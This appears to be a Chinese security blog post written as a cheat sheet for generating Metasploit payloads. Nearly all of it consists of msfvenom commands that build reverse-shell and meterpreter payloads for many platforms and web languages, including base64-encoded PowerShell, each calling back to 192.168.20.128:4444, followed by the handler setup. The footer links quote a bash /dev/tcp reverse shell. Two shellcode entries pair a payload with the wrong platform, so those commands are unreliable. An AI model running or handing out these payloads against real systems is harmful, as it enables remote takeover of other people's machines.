msf生成payload大全
前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html
网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan
目录
资源
一、payload
1.windwos
2.liunx
3.mac
4.android
5.Powershell
6.shellcode(windwos)
7.shellcode(liunx)
8.shellcode(mac)
二、反弹shell
1.python
2.bash
3.Perl
4.Lua
5.Ruby
6.php
7.aspx
8.asp
9.jsp
10.war
11.nodejs
三、监听
资源
msf生成payload大全_不知名白帽的博客-CSDN博客
一、payload
1.windwos
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f exe > shell.exe
2.liunx
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f elf > shell.elf
3.mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f macho > shell.macho
4.android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 R > test.apk
5.Powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
6.shellcode(windwos)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f c
7.shellcode(liunx)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f c
8.shellcode(mac)
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f c
二、反弹shell
1.python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py
msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py
2.bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.20.128 LPORT=4444 -f raw > shell.sh
3.Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.20.128 LPORT=4444 -f raw > shell.pl
4.Lua
msfvenom -p cmd/unix/reverse_lua LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.lua
5.Ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.rb
6.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
7.aspx
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f aspx -o shell.aspx
8.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f asp > shell.asp
9.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.jsp
10.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f war > shell.war
11.nodejs
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.js
三、监听
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST 192.168.20.128
set LPORT 4444
show options #查漏补缺
exploit
msf生成payload大全相关推荐
- msf生成linux shellcode,MSF-Shellcode生成和使用
1使用環境 Kali 2.0 msfvenom 2Msfvenom參數說明 msfvenom �Ch 查看幫助 說明: Options: -p, --payload 指定需 ...
- python 生成payload_msf生成payload
payload分类: 这里就分为正向木马和反向木马两类吧.咱知道的也有限,仅供参考... 反弹式木马简介: 反弹式shell(reverse shell)是一种从目标主机到攻击主机创建网络连接,并提供 ...
- msf常用payload
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用.生成payload使用的工具是MSFVenom ...
- msf注入payload
msf注入payload bash 参考文章 bash use exploit/windows/local/payload_inject set payload windows/meterpreter ...
- 我的世界服务器修改怪物生成,我的世界阻止服务器怪物生成指令大全
在我的世界游戏中,如果你是在玩服务器的话,你不想见到某种怪物,你就需要使用指令,下面小编就为大家整理出了我的世界阻止服务器怪物生成指令大全,希望大家喜欢! #+(true为是,false为否) spa ...
- 我的世界服务器修改生成怪物速度的文件,我的世界服务器禁止怪物生成指令大全...
我的世界服务器禁止怪物生成指令大全 我的世界服务器禁止怪物生成指令大全.有没有小伙伴和小编一样对于我的世界中各式各样的怪物头疼不已呢?是的话,今天大家有福了,因为小编今天教大家如何在自建服务器中使用禁 ...
- msf生成php反弹,反弹shell总结
1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&1 2.nc反弹nc -e /bin/sh 192.168.2.130 444 ...
- msf 生成.wsf 木马
** 网络安全重磅福利:入门&进阶全套282G学习资源包免费分享! ** 首先了解wsf是啥语言,可参考文章如下: https://www.cnblogs.com/vitrox/p/51374 ...
- MSF生成木马及木马的简单使用
0x00 前言 本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正. 由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVE ...
最新文章
- 如何解决XML文件中的警告提示“No grammar constraints (DTD or XML Schema) referenced in the document.”...
- python语言程序设计2019版第二章课后答案-python语言程序设计基础(嵩天)第二章课后习题...
- gperf的学习笔记(一)
- ViewHolder VS HolderView ?
- android下raw目录的作用,Android 之 assets目录和raw目录
- javascript学习系列(9):原数组发生变化的情况
- js判断字符串中某个字母出现次数最多
- mysql中的默认表_MySQL中表的默认类型为( )。_学小易找答案
- 物联网传感技术——光纤传感器
- Android数据加密之——Base64编码算法
- 前嗅教你大数据:采集金融界论坛数据
- CME ERROR错误代码列表
- java声音变音代码实现_大话音频变声原理 附简单示例代码
- 云聚创新力量,助力多云互联:Tungsten Fabric在联通沃云峰会2019上分享开源SDN
- c语言c2056错误,C语言中文网_c.biancheng.net - 爱站网站排行榜
- Buffon投针实验
- 转载几篇别人写的皮肤类控件的技术文章
- ROS学习笔记(十)——ROS试用练习(一)
- 《Java核心技术卷一》读书笔记
- MATLAB画三维球体函数